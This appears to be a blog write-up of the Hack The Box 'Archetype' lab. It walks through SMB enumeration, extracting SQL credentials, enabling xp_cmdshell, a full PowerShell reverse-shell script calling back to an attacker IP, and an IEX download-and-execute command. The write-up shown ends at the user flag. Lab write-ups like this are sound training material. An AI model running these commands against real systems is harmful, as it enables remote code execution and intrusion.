Today we are gonna dive into hacking, so Hack the box is popular service where aspiring hackers , penetration testers practice their skills and solve challenges . basically it’s like treasure hunt , what you need to do is hack the machines , and find two flags and submit it to succeed to the task.
Today , we are solving archetype box, this box is a starting point box (as for me ). So let’s exploit.
Basic Information
IP address : 10.10.10.27
Release date : 188 days (till today)
User owns : 27875
System owns : 28366
Machine rating : 4.0
Created by : egre55
https://app.hackthebox.eu/users/1190
Steps will be :
- Information gathering
- Getting into pilot seat (getting regular user access)
- Getting privileged User access
- Information Gathering
So as they say , more you know about the target , more you know how to exploit them
So first we are gonna do some information gathering using NMAP, NMAP is information gathering tool which is a network mapper and it;s use to discover open ports and services. Also in security auditing.
- sudo nmap -p -T4 -sV 10.10.10.27
After running these command we found out that port no. 139, 445, and 1433 are opened. So basically i googled them to find out more about them.
- About ports 139/445:
- About port 1433:
So port 139 is a NetBIOS session port , port 445 runs SMB protocol and port 1433 runs SQL server. Which means this machine is talking to other machines in a network to share some files . great news for us and also it also has sql server means it has some database which will be a great opportunity to established connecting (hope so it will accept my proposal )
- Getting regular user access
So let’s first focus on SMB. kali linux has preinstall tool call SMBMAP. Which helps us to check exposed shared resources and their permissions
- Smbmap -H 10.10.10.27 -u “ ” -p “ ”
So this command showed that there is two available shares with read access
- IPC$: this hidden share is a special share used for inter-process communication. It doesn’t allow one to access files or directories like other shares, but rather allows one to communicate with processes running on the remote system.
- backups: a normal share with read access. It lacks a comment which means it could contain interesting data if we’re able to connect to it.
Now , we will connect to “backups” using smbclient
- Smbclient //10.10.10.27/backups
There is a file called prod.dtsConfig . this is a SQL configuration file. So we have some credentials which can be used to connect to 1433. So to connect to this port msqliclient.py is used .
- mssqlclient.py ARCHETYPE/[email protected] -windows-auth
After connecting to sql server we will use IS_SERVROLEMEMBER function to find that this user is a pilot (root) or not
So this user have a root privileges . so we will use XP_CMDSHELL and we will gain RCE to host.
SQL> EXEC sp_configure ‘Show Advanced Options’, 1;
[*] INFO(ARCHETYPE): Line 185: Configuration option ‘show advanced options’ changed from 1 to 1. Run the RECONFIGURE statement to install.
SQL> reconfigure;
SQL> sp_configure;
SQL> EXEC sp_configure ‘xp_cmdshell’, 1
[*] INFO(ARCHETYPE): Line 185: Configuration option ‘xp_cmdshell’ changed from 1 to 1. Run the RECONFIGURE statement to install.
SQL> reconfigure;
SQL> xp_cmdshell “whoami”
Whoami will show that this user has admin privileges or now and for our favor, it has not any …
So we have to get proper pilot seat we will use powershell script to enumerate the system.
$client = New-Object System.Net.Sockets.TCPClient(“10.10.14.3”,443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + “# “;$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
Now order to host the file we will start a server.
- Python3 -m http.server 80
Now to listen, we will use netcat on 443 port
- Sudo ufw allow from 10.10.10.27
- Sudo rlwrap nc -nlvp 443
Now let’s submit a command to download and execute the shell through XP_CMDSHELL
- xp_cmdshell “powershell “IEX (New-Object Net.WebClient).DownloadString(\”http://10.10.14.3/shell.ps1\”);“
And we have a usr flag from deskop
One comment